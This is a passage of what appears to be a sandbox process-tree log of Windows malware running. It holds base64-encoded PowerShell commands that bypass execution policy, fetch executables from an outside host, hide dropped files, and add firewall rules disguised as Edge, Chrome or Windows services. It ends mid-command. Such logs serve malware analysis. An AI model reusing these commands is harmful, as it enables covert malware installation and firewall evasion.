YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAewB9AAoAZQBsAHMAZQAgAHsACgAJAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACIAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAcwAuAGYAcgBlAGUAcwBvAGYAdABwAGwAYQBjAGUALgBjAG8AbQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
                                          4⤵
                                            PID:4092
                                            • C:\Windows\system32\chcp.com
                                              "C:\Windows\system32\chcp.com" 1252
                                              5⤵
                                                PID:4860
                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                            -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss11CA.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi11C7.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr11C8.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr11C9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                            3⤵
                                              PID:1508
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAbQBhAGsAZQAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBzAC4AZgByAGUAZQBzAG8AZgB0AHAAbABhAGMAZQAuAGMAbwBtAC8ARQBtAGIAbQBhAGsAZQAuAGUAeABlACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBtAGEAawBlAC4AZQB4AGUAIgAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAbQBhAGsAZQAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
                                                4⤵
                                                  PID:5288
                                                  • C:\Windows\system32\chcp.com
                                                    "C:\Windows\system32\chcp.com" 1252
                                                    5⤵
                                                      PID:5616
                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                  -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3833.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi3830.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr3831.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr3832.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                  3⤵
                                                    PID:5564
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBzAC4AZgByAGUAZQBzAG8AZgB0AHAAbABhAGMAZQAuAGMAbwBtAC8ARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
                                                      4⤵
                                                        PID:2992
                                                        • C:\Windows\system32\chcp.com
                                                          "C:\Windows\system32\chcp.com" 1252
                                                          5⤵
                                                            PID:3372
                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                        -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss57F5.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi57F2.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr57F3.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr57F4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                        3⤵
                                                          PID:4956
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIgAgAC0ARwByAG8AdQBwACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIABFAFUATABBACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACAARQBVAEwAQQAiACAALQBHAHIAbwB1AHAAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAgAEUAVQBMAEEAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
                                                            4⤵
                                                              PID:5216
                                                              • C:\Windows\system32\chcp.com
                                                                "C:\Windows\system32\chcp.com" 1252
                                                                5⤵
                                                                  PID:1512
                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                              -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss5D88.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi5D85.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr5D86.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr5D87.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                              3⤵
                                                                PID:684
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIgAgAC0ARwByAG8AdQBwACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUA
                                                                  4⤵
                                                                    PID:5644
                                                                    • C:\Windows\system32\chcp.com
                                                                      "C:\Windows\system32\chcp.com" 1252
                                                                      5⤵
                                                                        PID:2408
                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6195.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6192.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6193.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6194.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                    3⤵
                                                                      PID:5300
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFQAdQBuAGkAbgBnACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUA
                                                                        4⤵
                                                                          PID:1380
                                                                          • C:\Windows\system32\chcp.com
                                                                            "C:\Windows\system32\chcp.com" 1252
                                                                            5⤵
                                                                              PID:3156
                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                          -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss65EF.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi65EC.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr65ED.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr65EE.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                          3⤵
                                                                            PID:3888
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc 